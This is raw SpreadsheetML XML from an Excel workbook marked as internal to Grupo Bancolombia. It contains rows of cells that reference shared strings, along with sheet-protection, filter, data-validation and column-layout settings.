    <row r="423" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A423" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B423" s="1"/>
      <c r="C423" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D423" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E423" s="1" t="s">
        <v>3071</v>
      </c>
      <c r="F423" s="26">
        <v>100</v>
      </c>
      <c r="G423" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H423" s="1" t="s">
        <v>3072</v>
      </c>
      <c r="I423" s="1" t="s">
        <v>172</v>
      </c>
      <c r="J423" s="1" t="s">
        <v>173</v>
      </c>
      <c r="K423" s="1" t="s">
        <v>13</v>
      </c>
      <c r="L423" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M423" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N423" s="1" t="s">
        <v>3073</v>
      </c>
      <c r="O423" s="1"/>
      <c r="P423" s="1"/>
      <c r="Q423" s="1" t="s">
        <v>3903</v>
      </c>
      <c r="R423" s="1"/>
      <c r="S423" s="1"/>
      <c r="T423" s="1"/>
      <c r="U423" s="1"/>
      <c r="V423" s="1"/>
      <c r="W423" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="424" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A424" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B424" s="1"/>
      <c r="C424" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D424" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E424" s="16" t="s">
        <v>3086</v>
      </c>
      <c r="F424" s="26">
        <v>100</v>
      </c>
      <c r="G424" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H424" s="1" t="s">
        <v>3087</v>
      </c>
      <c r="I424" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J424" s="1" t="s">
        <v>1572</v>
      </c>
      <c r="K424" s="1" t="s">
        <v>35</v>
      </c>
      <c r="L424" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M424" s="1" t="s">
        <v>148</v>
      </c>
      <c r="N424" s="1" t="s">
        <v>149</v>
      </c>
      <c r="O424" s="1"/>
      <c r="P424" s="1" t="s">
        <v>3088</v>
      </c>
      <c r="Q424" s="1" t="s">
        <v>3904</v>
      </c>
      <c r="R424" s="1"/>
      <c r="S424" s="1"/>
      <c r="T424" s="1"/>
      <c r="U424" s="1"/>
      <c r="V424" s="1"/>
      <c r="W424" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="425" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A425" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B425" s="1"/>
      <c r="C425" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D425" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E425" s="16" t="s">
        <v>3294</v>
      </c>
      <c r="F425" s="26">
        <v>100</v>
      </c>
      <c r="G425" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H425" s="1" t="s">
        <v>3295</v>
      </c>
      <c r="I425" s="1" t="s">
        <v>546</v>
      </c>
      <c r="J425" s="1" t="s">
        <v>547</v>
      </c>
      <c r="K425" s="1" t="s">
        <v>20</v>
      </c>
      <c r="L425" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M425" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N425" s="1"/>
      <c r="O425" s="1"/>
      <c r="P425" s="1"/>
      <c r="Q425" s="1" t="s">
        <v>550</v>
      </c>
      <c r="R425" s="1"/>
      <c r="S425" s="1"/>
      <c r="T425" s="1"/>
      <c r="U425" s="1"/>
      <c r="V425" s="1"/>
      <c r="W425" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="426" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A426" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B426" s="1"/>
      <c r="C426" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D426" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E426" s="1" t="s">
        <v>3380</v>
      </c>
      <c r="F426" s="34">
        <v>100</v>
      </c>
      <c r="G426" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H426" s="1" t="s">
        <v>3381</v>
      </c>
      <c r="I426" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J426" s="1" t="s">
        <v>43</v>
      </c>
      <c r="K426" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L426" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M426" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N426" s="1"/>
      <c r="O426" s="1"/>
      <c r="P426" s="1" t="s">
        <v>2026</v>
      </c>
      <c r="Q426" s="1" t="s">
        <v>787</v>
      </c>
      <c r="R426" s="1"/>
      <c r="S426" s="1"/>
      <c r="T426" s="1"/>
      <c r="U426" s="1"/>
      <c r="V426" s="1"/>
      <c r="W426" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="427" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A427" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B427" s="1"/>
      <c r="C427" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D427" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E427" s="1" t="s">
        <v>3382</v>
      </c>
      <c r="F427" s="26">
        <v>100</v>
      </c>
      <c r="G427" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H427" s="1" t="s">
        <v>3383</v>
      </c>
      <c r="I427" s="1" t="s">
        <v>156</v>
      </c>
      <c r="J427" s="1" t="s">
        <v>301</v>
      </c>
      <c r="K427" s="1" t="s">
        <v>26</v>
      </c>
      <c r="L427" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M427" s="1" t="s">
        <v>301</v>
      </c>
      <c r="N427" s="1" t="s">
        <v>476</v>
      </c>
      <c r="O427" s="1"/>
      <c r="P427" s="1" t="s">
        <v>3384</v>
      </c>
      <c r="Q427" s="1" t="s">
        <v>1607</v>
      </c>
      <c r="R427" s="1"/>
      <c r="S427" s="1"/>
      <c r="T427" s="1"/>
      <c r="U427" s="1"/>
      <c r="V427" s="1"/>
      <c r="W427" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="428" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A428" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B428" s="1"/>
      <c r="C428" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D428" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E428" s="1" t="s">
        <v>3402</v>
      </c>
      <c r="F428" s="26">
        <v>100</v>
      </c>
      <c r="G428" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H428" s="1" t="s">
        <v>3403</v>
      </c>
      <c r="I428" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J428" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K428" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L428" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M428" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N428" s="1" t="s">
        <v>221</v>
      </c>
      <c r="O428" s="1"/>
      <c r="P428" s="1"/>
      <c r="Q428" s="1" t="s">
        <v>3905</v>
      </c>
      <c r="R428" s="1"/>
      <c r="S428" s="1"/>
      <c r="T428" s="1"/>
      <c r="U428" s="1"/>
      <c r="V428" s="1"/>
      <c r="W428" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="429" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A429" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B429" s="1"/>
      <c r="C429" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D429" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E429" s="1" t="s">
        <v>3405</v>
      </c>
      <c r="F429" s="26">
        <v>100</v>
      </c>
      <c r="G429" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H429" s="1" t="s">
        <v>3406</v>
      </c>
      <c r="I429" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J429" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K429" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L429" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M429" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N429" s="1"/>
      <c r="O429" s="1"/>
      <c r="P429" s="1" t="s">
        <v>2566</v>
      </c>
      <c r="Q429" s="1" t="s">
        <v>2567</v>
      </c>
      <c r="R429" s="1"/>
      <c r="S429" s="1"/>
      <c r="T429" s="1"/>
      <c r="U429" s="1"/>
      <c r="V429" s="1"/>
      <c r="W429" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="430" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A430" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B430" s="1"/>
      <c r="C430" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D430" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E430" s="1" t="s">
        <v>3407</v>
      </c>
      <c r="F430" s="26">
        <v>100</v>
      </c>
      <c r="G430" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H430" s="1" t="s">
        <v>3408</v>
      </c>
      <c r="I430" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J430" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K430" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L430" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M430" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N430" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O430" s="1"/>
      <c r="P430" s="1"/>
      <c r="Q430" s="1" t="s">
        <v>3906</v>
      </c>
      <c r="R430" s="1"/>
      <c r="S430" s="1"/>
      <c r="T430" s="1"/>
      <c r="U430" s="1"/>
      <c r="V430" s="1"/>
      <c r="W430" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="431" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A431" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B431" s="1"/>
      <c r="C431" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D431" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E431" s="1" t="s">
        <v>3410</v>
      </c>
      <c r="F431" s="26">
        <v>100</v>
      </c>
      <c r="G431" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H431" s="1" t="s">
        <v>3411</v>
      </c>
      <c r="I431" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J431" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K431" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L431" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M431" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N431" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O431" s="1"/>
      <c r="P431" s="1"/>
      <c r="Q431" s="1" t="s">
        <v>3761</v>
      </c>
      <c r="R431" s="1"/>
      <c r="S431" s="1"/>
      <c r="T431" s="1"/>
      <c r="U431" s="1"/>
      <c r="V431" s="1"/>
      <c r="W431" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="432" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A432" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B432" s="1"/>
      <c r="C432" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D432" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E432" s="1" t="s">
        <v>3412</v>
      </c>
      <c r="F432" s="26">
        <v>100</v>
      </c>
      <c r="G432" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H432" s="1" t="s">
        <v>3413</v>
      </c>
      <c r="I432" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J432" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K432" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L432" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M432" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N432" s="1"/>
      <c r="O432" s="1"/>
      <c r="P432" s="1" t="s">
        <v>772</v>
      </c>
      <c r="Q432" s="1" t="s">
        <v>3907</v>
      </c>
      <c r="R432" s="1"/>
      <c r="S432" s="1"/>
      <c r="T432" s="1"/>
      <c r="U432" s="1"/>
      <c r="V432" s="1"/>
      <c r="W432" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="433" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A433" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B433" s="1"/>
      <c r="C433" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D433" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E433" s="1" t="s">
        <v>3415</v>
      </c>
      <c r="F433" s="26">
        <v>100</v>
      </c>
      <c r="G433" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H433" s="1" t="s">
        <v>3416</v>
      </c>
      <c r="I433" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J433" s="1" t="s">
        <v>76</v>
      </c>
      <c r="K433" s="1" t="s">
        <v>15</v>
      </c>
      <c r="L433" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M433" s="1" t="s">
        <v>90</v>
      </c>
      <c r="N433" s="1" t="s">
        <v>91</v>
      </c>
      <c r="O433" s="1"/>
      <c r="P433" s="1"/>
      <c r="Q433" s="1" t="s">
        <v>465</v>
      </c>
      <c r="R433" s="1"/>
      <c r="S433" s="1"/>
      <c r="T433" s="1"/>
      <c r="U433" s="1"/>
      <c r="V433" s="1"/>
      <c r="W433" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="434" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A434" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B434" s="1"/>
      <c r="C434" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D434" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E434" s="1" t="s">
        <v>3417</v>
      </c>
      <c r="F434" s="26">
        <v>100</v>
      </c>
      <c r="G434" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H434" s="1" t="s">
        <v>3418</v>
      </c>
      <c r="I434" s="1" t="s">
        <v>196</v>
      </c>
      <c r="J434" s="1" t="s">
        <v>197</v>
      </c>
      <c r="K434" s="1" t="s">
        <v>18</v>
      </c>
      <c r="L434" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M434" s="1" t="s">
        <v>18</v>
      </c>
      <c r="N434" s="16" t="s">
        <v>198</v>
      </c>
      <c r="O434" s="1"/>
      <c r="P434" s="1" t="s">
        <v>242</v>
      </c>
      <c r="Q434" s="1" t="s">
        <v>3419</v>
      </c>
      <c r="R434" s="1"/>
      <c r="S434" s="1"/>
      <c r="T434" s="1"/>
      <c r="U434" s="1"/>
      <c r="V434" s="1"/>
      <c r="W434" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="435" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A435" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B435" s="1"/>
      <c r="C435" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D435" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E435" s="1" t="s">
        <v>3420</v>
      </c>
      <c r="F435" s="26">
        <v>100</v>
      </c>
      <c r="G435" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H435" s="1" t="s">
        <v>3421</v>
      </c>
      <c r="I435" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J435" s="1" t="s">
        <v>43</v>
      </c>
      <c r="K435" s="1" t="s">
        <v>24</v>
      </c>
      <c r="L435" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M435" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N435" s="1"/>
      <c r="O435" s="1"/>
      <c r="P435" s="1" t="s">
        <v>2026</v>
      </c>
      <c r="Q435" s="1" t="s">
        <v>787</v>
      </c>
      <c r="R435" s="1"/>
      <c r="S435" s="1"/>
      <c r="T435" s="1"/>
      <c r="U435" s="1"/>
      <c r="V435" s="1"/>
      <c r="W435" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="436" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A436" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B436" s="1"/>
      <c r="C436" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D436" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E436" s="1" t="s">
        <v>3426</v>
      </c>
      <c r="F436" s="26">
        <v>100</v>
      </c>
      <c r="G436" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H436" s="1" t="s">
        <v>3427</v>
      </c>
      <c r="I436" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J436" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K436" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L436" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M436" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N436" s="1"/>
      <c r="O436" s="1"/>
      <c r="P436" s="1" t="s">
        <v>2566</v>
      </c>
      <c r="Q436" s="1" t="s">
        <v>827</v>
      </c>
      <c r="R436" s="1"/>
      <c r="S436" s="1"/>
      <c r="T436" s="1"/>
      <c r="U436" s="1"/>
      <c r="V436" s="1"/>
      <c r="W436" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="437" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A437" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B437" s="1"/>
      <c r="C437" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D437" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E437" s="1" t="s">
        <v>3428</v>
      </c>
      <c r="F437" s="26">
        <v>100</v>
      </c>
      <c r="G437" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H437" s="1" t="s">
        <v>3429</v>
      </c>
      <c r="I437" s="1" t="s">
        <v>103</v>
      </c>
      <c r="J437" s="1" t="s">
        <v>104</v>
      </c>
      <c r="K437" s="1" t="s">
        <v>19</v>
      </c>
      <c r="L437" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M437" s="1" t="s">
        <v>104</v>
      </c>
      <c r="N437" s="1"/>
      <c r="O437" s="1"/>
      <c r="P437" s="1" t="s">
        <v>246</v>
      </c>
      <c r="Q437" s="1" t="s">
        <v>247</v>
      </c>
      <c r="R437" s="1"/>
      <c r="S437" s="1"/>
      <c r="T437" s="1"/>
      <c r="U437" s="1"/>
      <c r="V437" s="1"/>
      <c r="W437" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="438" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A438" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B438" s="1"/>
      <c r="C438" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D438" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E438" s="1" t="s">
        <v>3430</v>
      </c>
      <c r="F438" s="26">
        <v>100</v>
      </c>
      <c r="G438" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H438" s="1" t="s">
        <v>3431</v>
      </c>
      <c r="I438" s="1" t="s">
        <v>75</v>
      </c>
      <c r="J438" s="1" t="s">
        <v>236</v>
      </c>
      <c r="K438" s="1" t="s">
        <v>21</v>
      </c>
      <c r="L438" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M438" s="1" t="s">
        <v>236</v>
      </c>
      <c r="N438" s="1"/>
      <c r="O438" s="1"/>
      <c r="P438" s="1" t="s">
        <v>909</v>
      </c>
      <c r="Q438" s="1" t="s">
        <v>3908</v>
      </c>
      <c r="R438" s="1"/>
      <c r="S438" s="1"/>
      <c r="T438" s="1"/>
      <c r="U438" s="1"/>
      <c r="V438" s="1"/>
      <c r="W438" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="439" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A439" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B439" s="1"/>
      <c r="C439" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D439" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E439" s="1" t="s">
        <v>3450</v>
      </c>
      <c r="F439" s="26">
        <v>100</v>
      </c>
      <c r="G439" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H439" s="1" t="s">
        <v>3451</v>
      </c>
      <c r="I439" s="1" t="s">
        <v>82</v>
      </c>
      <c r="J439" s="1" t="s">
        <v>32</v>
      </c>
      <c r="K439" s="1" t="s">
        <v>32</v>
      </c>
      <c r="L439" s="1" t="s">
        <v>83</v>
      </c>
      <c r="M439" s="1" t="s">
        <v>72</v>
      </c>
      <c r="N439" s="1"/>
      <c r="O439" s="1"/>
      <c r="P439" s="1" t="s">
        <v>2065</v>
      </c>
      <c r="Q439" s="1" t="s">
        <v>3684</v>
      </c>
      <c r="R439" s="1"/>
      <c r="S439" s="1"/>
      <c r="T439" s="1"/>
      <c r="U439" s="1"/>
      <c r="V439" s="1"/>
      <c r="W439" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="440" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A440" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B440" s="1"/>
      <c r="C440" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D440" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E440" s="1" t="s">
        <v>3452</v>
      </c>
      <c r="F440" s="26">
        <v>100</v>
      </c>
      <c r="G440" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H440" s="1" t="s">
        <v>3927</v>
      </c>
      <c r="I440" s="1" t="s">
        <v>268</v>
      </c>
      <c r="J440" s="1" t="s">
        <v>269</v>
      </c>
      <c r="K440" s="1" t="s">
        <v>10</v>
      </c>
      <c r="L440" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M440" s="1" t="s">
        <v>290</v>
      </c>
      <c r="N440" s="16" t="s">
        <v>291</v>
      </c>
      <c r="O440" s="1"/>
      <c r="P440" s="1" t="s">
        <v>250</v>
      </c>
      <c r="Q440" s="1" t="s">
        <v>3909</v>
      </c>
      <c r="R440" s="1"/>
      <c r="S440" s="1"/>
      <c r="T440" s="1"/>
      <c r="U440" s="1"/>
      <c r="V440" s="1"/>
      <c r="W440" s="1" t="s">
        <v>5</v>
      </c>
    </row>
    <row r="441" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A441" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B441" s="1"/>
      <c r="C441" s="1" t="s">
        <v>72</v>
      </c>
      <c r="D441" s="1" t="s">
        <v>72</v>
      </c>
      <c r="E441" s="1" t="s">
        <v>3455</v>
      </c>
      <c r="F441" s="26">
        <v>200</v>
      </c>
      <c r="G441" s="26" t="s">
        <v>72</v>
      </c>
      <c r="H441" s="1" t="s">
        <v>3456</v>
      </c>
      <c r="I441" s="1" t="s">
        <v>611</v>
      </c>
      <c r="J441" s="1" t="s">
        <v>612</v>
      </c>
      <c r="K441" s="1" t="s">
        <v>14</v>
      </c>
      <c r="L441" s="1" t="s">
        <v>77</v>
      </c>
      <c r="M441" s="1" t="s">
        <v>612</v>
      </c>
      <c r="N441" s="1" t="s">
        <v>613</v>
      </c>
      <c r="O441" s="1"/>
      <c r="P441" s="1" t="s">
        <v>2911</v>
      </c>
      <c r="Q441" s="1" t="s">
        <v>3898</v>
      </c>
      <c r="R441" s="1"/>
      <c r="S441" s="1"/>
      <c r="T441" s="1"/>
      <c r="U441" s="1"/>
      <c r="V441" s="1"/>
      <c r="W441" s="1" t="s">
        <v>5</v>
      </c>
    </row>
  </sheetData>
  <sheetProtection algorithmName="SHA-512" hashValue="dpgrplb108nOhkRJygjjWFZAVefYrBkCQtxcwNYlJBxvr3V6rkI4rSVjEe1WNYP5ci1EimRCL3lyn7LEYs6CYA==" saltValue="1xioQxTy+miqgCrr7mpuZA==" spinCount="100000" sheet="1" sort="0" autoFilter="0" pivotTables="0"/>
  <autoFilter ref="A1:W441" xr:uid="{24B361CB-5F06-4852-8172-264F86855FCC}"/>
  <dataValidations count="2">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="P344:P356 P432:P433 P422:P423 P425 P359:P366 P256 P254 P400 P276:P277 P411:P412" xr:uid="{A6C39072-7726-4089-87BC-E54511742C13}">
      <formula1>INDIRECT(#REF!)</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="J2:J195 J197:J441" xr:uid="{60758164-BF50-4684-8A94-4D7CFAEAA58A}">
      <formula1>INDIRECT(I2)</formula1>
    </dataValidation>
  </dataValidations>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
  <headerFooter>
    <oddHeader>&amp;L&amp;"Calibri"&amp;10&amp;K000000Grupo Bancolombia Clasificación – Interna&amp;1#&amp;C&amp;G</oddHeader>
  </headerFooter>
  <legacyDrawing r:id="rId2"/>
  <legacyDrawingHF r:id="rId3"/>
  <extLst>
    <ext xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main" uri="{CCE6A557-97BC-4b89-ADB6-D9C93CAAB3DF}">
      <x14:dataValidations xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" count="1">
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" xr:uid="{4FD850B3-98DD-4140-8EB0-A7486EA89563}">
          <x14:formula1>
            <xm:f>Lista!$A$1:$R$1</xm:f>
          </x14:formula1>
          <xm:sqref>I2:I195 I197:I441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27D0C-7643-41B4-AEE5-16E3AF4FF553}">
  <sheetPr codeName="Hoja8"/>
  <dimension ref="A1:W102"/>
  <sheetViews>
    <sheetView topLeftCell="A88" workbookViewId="0">
      <selection activeCell="E102" sqref="E102"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultColWidth="11.453125" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="3" max="3" width="21.453125" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="21" bestFit="1" customWidth="1"/>
    <col min="5" max="5" width="50" bestFit="1" customWidth="1"/>
    <col min="6" max="6" width="9" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="23.54296875" bestFit="1" customWidth="1"/>
    <col min="8" max="8" width="29.36328125" customWidth="1"/>
    <col min="9" max="9" width="48.90625" bestFit="1" customWidth="1"/>
    <col min="10" max="10" width="48.90625" customWidth="1"/>
    <col min="11" max="11" width="29.54296875" bestFit="1" customWidth="1"/>
    <col min="12" max="12" width="29.54296875" customWidth="1"/>
    <col min="13" max="14" width="32.453125" customWidth="1"/>
    <col min="15" max="15" width="23.453125" customWidth="1"/>
    <col min="16" max="16" width="21.90625" customWidth="1"/>
    <col min="17" max="17" width="18.6328125" customWidth="1"/>
    <col min="18" max="18" width="11.08984375" bestFit="1" customWidth="1"/>
    <col min="19" max="19" width="9.90625" bestFit="1" customWidth="1"/>
    <col min="20" max="20" width="10.54296875" bestFit="1" customWidth="1"/>
    <col min="21" max="21" width="10.36328125" bestFit="1" customWidth="1"/>
    <col min="22" max="22" width="10.36328125" customWidth="1"/>
    <col min="23" max="23" width="14" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A1" s="28" t="s">
        <v>1</v>
      </c>
      <c r="B1" s="46" t="s">
        <v>51</v>
      </c>
      <c r="C1" s="46" t="s">
        <v>52</v>
      </c>
      <c r="D1" s="46" t="s">
        <v>53</v>
      </c>
      <c r="E1" s="29" t="s">
        <v>54</v>
      </c>
      <c r="F1" s="30" t="s">
        <v>55</v>
      </c>
      <c r="G1" s="30" t="s">
        <v>56</v>
      </c>
      <c r="H1" s="29" t="s">
        <v>57</v>
      </c>
      <c r="I1" s="29" t="s">
        <v>58</v>
      </c>
      <c r="J1" s="29" t="s">
        <v>59</v>
      </c>
      <c r="K1" s="29" t="s">
        <v>8</v>
      </c>
      <c r="L1" s="29" t="s">
        <v>60</v>
      </c>
      <c r="M1" s="29" t="s">
        <v>61</v>
      </c>
      <c r="N1" s="29" t="s">
        <v>62</v>
      </c>
      <c r="O1" s="29" t="s">
        <v>63</v>
      </c>
      <c r="P1" s="29" t="s">
        <v>64</v>
      </c>
      <c r="Q1" s="31" t="s">
        <v>65</v>
      </c>
      <c r="R1" s="31" t="s">
        <v>66</v>
      </c>
      <c r="S1" s="31" t="s">
        <v>67</v>
      </c>
      <c r="T1" s="31" t="s">
        <v>68</v>
      </c>
      <c r="U1" s="31" t="s">
        <v>69</v>
      </c>
      <c r="V1" s="53" t="s">
        <v>70</v>
      </c>
      <c r="W1" s="29" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="2" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A2" s="1" t="s">
        <v>5</v>
      </c>
      <c r="B2" s="1"/>
      <c r="C2" s="1"/>
      <c r="D2" s="1"/>
      <c r="E2" s="1" t="s">
        <v>2444</v>
      </c>
      <c r="F2" s="34"/>
      <c r="G2" s="34"/>
      <c r="H2" s="1" t="s">
        <v>2441</v>
      </c>
      <c r="I2" s="1" t="s">
        <v>31</v>
      </c>
      <c r="J2" s="1" t="s">
        <v>262</v>
      </c>
      <c r="K2" s="1"/>
      <c r="L2" s="1"/>
      <c r="M2" s="1"/>
      <c r="N2" s="1"/>
      <c r="O2" s="1"/>
      <c r="P2" s="1" t="s">
        <v>2445</v>
      </c>
      <c r="Q2" s="1" t="s">
        <v>3632</v>
      </c>
      <c r="R2" s="1"/>
      <c r="S2" s="1"/>
      <c r="T2" s="1"/>
      <c r="U2" s="1"/>
      <c r="V2" s="1"/>
      <c r="W2" s="1" t="s">
        <v>2443</v>
      </c>
    </row>
